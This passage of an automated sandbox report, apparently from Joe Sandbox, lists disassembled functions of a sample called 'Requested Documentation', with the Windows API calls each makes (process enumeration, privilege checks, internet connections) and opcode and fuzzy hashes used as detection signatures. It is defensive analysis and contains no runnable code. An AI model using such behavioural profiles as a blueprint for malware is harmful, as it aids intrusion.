                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: bce828c436e59f14b1b7a0bec6e28bce8f2ddb024baac03bdcc66978d64548f0
                                                                              • Instruction ID: c09738185bf16f6f1f29bc73d6fc66f6ef426ac3c70e64089805c74182a373c1
                                                                              • Opcode Fuzzy Hash: bce828c436e59f14b1b7a0bec6e28bce8f2ddb024baac03bdcc66978d64548f0
                                                                              • Instruction Fuzzy Hash: E9313CB1D00108AFCB10EFB5C885AEFB7F9EF88304F10406AE815E7241DA71AE45CBA0
                                                                              Function 009E3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 009E3C7A
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 009E3C88
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 009E3CA8
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009E3D52
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 420147892-0
                                                                              • Opcode ID: 5a0183bf96232f8ac2b9aacfef8011134005c76a91dbd73bf37b816579b81bfb
                                                                              • Instruction ID: ed013e6007f0c3db720e89ce0936ad5535b9d0343fab9977a7e4f7e3faac0fd0
                                                                              • Opcode Fuzzy Hash: 5a0183bf96232f8ac2b9aacfef8011134005c76a91dbd73bf37b816579b81bfb
                                                                              • Instruction Fuzzy Hash: C2319C711083459FC311EF51C885BABBBE8AFD9310F50092CF582862A1EB71DE4ACB92
                                                                              Function 00A0C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • GetCursorPos.USER32(?), ref: 00A0C4D2
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009BB9AB,?,?,?,?,?), ref: 00A0C4E7
                                                                              • GetCursorPos.USER32(?), ref: 00A0C534
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009BB9AB,?,?,?), ref: 00A0C56E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                              • String ID:
                                                                              • API String ID: 2864067406-0
                                                                              • Opcode ID: 9499f2318ed0e3a7bbd6a4dfe3de808d5fd94351530ff222d24dc9784c311f3a
                                                                              • Instruction ID: 4281d56c1d077f6b98ce69d887f9a201923b1d0d411df474a6e796463d023c29
                                                                              • Opcode Fuzzy Hash: 9499f2318ed0e3a7bbd6a4dfe3de808d5fd94351530ff222d24dc9784c311f3a
                                                                              • Instruction Fuzzy Hash: 7B31853990005CAFCB25CF98DC68EEA7BB5EB49320F444165F9059B2A1C732BD51DBA4
                                                                              Function 009D8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8121
                                                                                • Part of subcall function 009D810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D812B
                                                                                • Part of subcall function 009D810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D813A
                                                                                • Part of subcall function 009D810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8141
                                                                                • Part of subcall function 009D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8157
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009D86A3
                                                                              • _memcmp.LIBCMT ref: 009D86C6
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D86FC
                                                                              • HeapFree.KERNEL32(00000000), ref: 009D8703
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                              • String ID:
                                                                              • API String ID: 1592001646-0
                                                                              • Opcode ID: 35d2042468d3a4c34917c7ab5f066901c52b5af2492e07433d57d4f286e3e104
                                                                              • Instruction ID: 054cc4d9b4de81218f063a449f3021b1ae418c2295f7c3e0af358dad200815b6
                                                                              • Opcode Fuzzy Hash: 35d2042468d3a4c34917c7ab5f066901c52b5af2492e07433d57d4f286e3e104
                                                                              • Instruction Fuzzy Hash: CF217C71E84209EFDB10DFA4C949BEEB7B8EF44314F55805AE444A7242EB30AE05CB90
                                                                              Function 009A098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __setmode.LIBCMT ref: 009A09AE
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7896,?,?,00000000), ref: 00985A2C
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7896,?,?,00000000,?,?), ref: 00985A50
                                                                              • _fprintf.LIBCMT ref: 009A09E5
                                                                              • OutputDebugStringW.KERNEL32(?), ref: 009D5DBB
                                                                                • Part of subcall function 009A4AAA: _flsall.LIBCMT ref: 009A4AC3
                                                                              • __setmode.LIBCMT ref: 009A0A1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                              • String ID:
                                                                              • API String ID: 521402451-0
                                                                              • Opcode ID: a2726d312c1f8d97b49944b8dd1042be4da73a45b23bb02c7dd5ee0b417149dc
                                                                              • Instruction ID: 9b23bdc83fd95ace9a7b38a1d393ab86c3346de0f515c27e7e6a38b593ca0a5d
                                                                              • Opcode Fuzzy Hash: a2726d312c1f8d97b49944b8dd1042be4da73a45b23bb02c7dd5ee0b417149dc
                                                                              • Instruction Fuzzy Hash: A21127319046046FD704B7B8AC47AFE776D9FC7320F24012AF10566282EEA55C4697E1
                                                                              Function 009F1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009F17A3
                                                                                • Part of subcall function 009F182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F184C
                                                                                • Part of subcall function 009F182D: InternetCloseHandle.WININET(00000000), ref: 009F18E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                              • String ID:
                                                                              • API String ID: 1463438336-0
                                                                              • Opcode ID: 4cd5aed8d13367d58fc4c3b2098e8659fa6df8da836f1bf9d6d6f559dcdaedd2
                                                                              • Instruction ID: e595a7c55ff799561e319e3d3ad38f0ee06b3ca16232c193018a2c27372c11e2
                                                                              • Opcode Fuzzy Hash: 4cd5aed8d13367d58fc4c3b2098e8659fa6df8da836f1bf9d6d6f559dcdaedd2
                                                                              • Instruction Fuzzy Hash: E921A431200609FFEB169F60DC01FBABBADFF88750F14442AFB15A6550D775982297E1
                                                                              Function 009E3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(?,00A0FAC0), ref: 009E3A64
                                                                              • GetLastError.KERNEL32 ref: 009E3A73
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 009E3A82
                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A0FAC0), ref: 009E3ADF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 2267087916-0
                                                                              • Opcode ID: cf3ca5ae714c01723f1e5feb24f998278a883dc622feb318048499ce9fd783e0
                                                                              • Instruction ID: 5fe02c5955675db08e416692a8bf61efed3700358cc2e21aae838ee38e3b5627
                                                                              • Opcode Fuzzy Hash: cf3ca5ae714c01723f1e5feb24f998278a883dc622feb318048499ce9fd783e0
                                                                              • Instruction Fuzzy Hash: E821D634108205DFC310EF29C8859AAB7E8BE59364F108A2DF499D72E1D731DE86CB82
                                                                              Function 009DDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009DF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009DDCD3,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?), ref: 009DF0CB
                                                                                • Part of subcall function 009DF0BC: lstrcpyW.KERNEL32(00000000,?,?,009DDCD3,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DF0F1
                                                                                • Part of subcall function 009DF0BC: lstrcmpiW.KERNEL32(00000000,?,009DDCD3,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?), ref: 009DF122
                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DDCEC
                                                                              • lstrcpyW.KERNEL32(00000000,?,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DDD12
                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DDD46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                              • String ID: cdecl
                                                                              • API String ID: 4031866154-3896280584
                                                                              • Opcode ID: ae1cf44b073f8d2584df545eb08ec3e71f21c838f08ae336620e68ace12a311d
                                                                              • Instruction ID: 859cf059334b8032c9b4eb7ba71fd62d106de2815f2c93fcb66a21f89c633137
                                                                              • Opcode Fuzzy Hash: ae1cf44b073f8d2584df545eb08ec3e71f21c838f08ae336620e68ace12a311d
                                                                              • Instruction Fuzzy Hash: A211BE3A200309EFCF25AF74D845A7A77A9FF86350B50812BF906CB7A0EB719841C791
                                                                              Function 009B50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 009B5101
                                                                                • Part of subcall function 009A571C: __FF_MSGBANNER.LIBCMT ref: 009A5733
                                                                                • Part of subcall function 009A571C: __NMSG_WRITE.LIBCMT ref: 009A573A
                                                                                • Part of subcall function 009A571C: RtlAllocateHeap.NTDLL(01340000,00000000,00000001,00000000,?,?,?,009A0DD3,?), ref: 009A575F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free
                                                                              • String ID:
                                                                              • API String ID: 614378929-0
                                                                              • Opcode ID: c48eb5a5173ac36264d8f3063e414b333815d9c3f22e1b9f0e5d909b6a5c5f94
                                                                              • Instruction ID: 634ad9a0d5834dd3edf008d948d7e695f55200fb871b34eee1af5f94302264a0
                                                                              • Opcode Fuzzy Hash: c48eb5a5173ac36264d8f3063e414b333815d9c3f22e1b9f0e5d909b6a5c5f94
                                                                              • Instruction Fuzzy Hash: A5110AB2908A15AFCF316FB8BD0579E379C9F46371B124929FA049A151DF35C84187D0
                                                                              Function 009844A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009844CF
                                                                                • Part of subcall function 0098407C: _memset.LIBCMT ref: 009840FC
                                                                                • Part of subcall function 0098407C: _wcscpy.LIBCMT ref: 00984150
                                                                                • Part of subcall function 0098407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00984160
                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00984524
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00984533
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009BD4B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1378193009-0
                                                                              • Opcode ID: 86137f8b90d77ec2dc2cb4b38fb2454890579a9cbec701cd913925f9c1f647f6
                                                                              • Instruction ID: 5470338bc77d64526a99fceb7f377ec6be73a91a6e961d5001780b0f027ac214
                                                                              • Opcode Fuzzy Hash: 86137f8b90d77ec2dc2cb4b38fb2454890579a9cbec701cd913925f9c1f647f6
                                                                              • Instruction Fuzzy Hash: 122137748043889FE732DB248885BEBBBECAF02318F04048EF69E57282D3742985CB41
                                                                              Function 009F6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7896,?,?,00000000), ref: 00985A2C
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7896,?,?,00000000,?,?), ref: 00985A50
                                                                              • gethostbyname.WSOCK32(?,?,?), ref: 009F6399
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F63A4
                                                                              • _memmove.LIBCMT ref: 009F63D1
                                                                              • inet_ntoa.WSOCK32(?), ref: 009F63DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                              • String ID:
                                                                              • API String ID: 1504782959-0
                                                                              • Opcode ID: b2b6a6b215c40ec0b351e89052d2e07d1ad9b0f574006c873ecfb7ae8786a698
                                                                              • Instruction ID: 35b46579d226d4f515e775d2445aa2b18a033c9db2e3e6dc7ba660ddb68fc718
                                                                              • Opcode Fuzzy Hash: b2b6a6b215c40ec0b351e89052d2e07d1ad9b0f574006c873ecfb7ae8786a698
                                                                              • Instruction Fuzzy Hash: 55112E35500109AFCF04FBA4DD86EFEB7B8AF88310B544465F506B7261DB31AE19DBA1
                                                                              Function 009D8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 009D8B61
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D8B73
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D8B89
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D8BA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 9511a8538d0606709b06c4e03c96d31bacd142277a9474926f979224d69be8d7
                                                                              • Instruction ID: 3c8065af80ea36cd3260e07734334653efad92b643092d63fc1eaf4ac23b4f1c
                                                                              • Opcode Fuzzy Hash: 9511a8538d0606709b06c4e03c96d31bacd142277a9474926f979224d69be8d7
                                                                              • Instruction Fuzzy Hash: D4115E79940218FFDB10DFA5CC84FAEBB78FB48710F2040A6E900B7250DA716E11DB94
                                                                              Function 00981290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 009812D8
                                                                              • GetClientRect.USER32(?,?), ref: 009BB5FB
                                                                              • GetCursorPos.USER32(?), ref: 009BB605
                                                                              • ScreenToClient.USER32(?,?), ref: 009BB610
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 4127811313-0
                                                                              • Opcode ID: 62dd6c005ff9e64cb3826d7424726e88497688147a4c8c4d5b54a2b7a2789b10
                                                                              • Instruction ID: 8dcbd4addf86fbdd61396bc3bc1d585ebd437777f987b7160041c3cea6d5cd59
                                                                              • Opcode Fuzzy Hash: 62dd6c005ff9e64cb3826d7424726e88497688147a4c8c4d5b54a2b7a2789b10
                                                                              • Instruction Fuzzy Hash: 92112835A0011DAFCB10EFA8D8859EE77BCEB45311F400456F911E7241D730BA528BA5
                                                                              Function 009E1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E115F
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E1184
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E118E
                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E11C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CounterPerformanceQuerySleep
                                                                              • String ID:
                                                                              • API String ID: 2875609808-0
                                                                              • Opcode ID: 35d9fa5b8424743516c1fe016eea3a415338537827c8f71bdace7f74a8be3c16
                                                                              • Instruction ID: 6e9cb8b7124ab5cd910b3f246077d3233e788bd4b744da73885b0af5572445a3
                                                                              • Opcode Fuzzy Hash: 35d9fa5b8424743516c1fe016eea3a415338537827c8f71bdace7f74a8be3c16
                                                                              • Instruction Fuzzy Hash: 2B114831C0465DEBCF05DFE6D888AEEBB78FB09711F004555EA45B2240CB7099518BD1
                                                                              Function 009DD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009DD84D
                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009DD864
                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009DD879
                                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009DD897
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
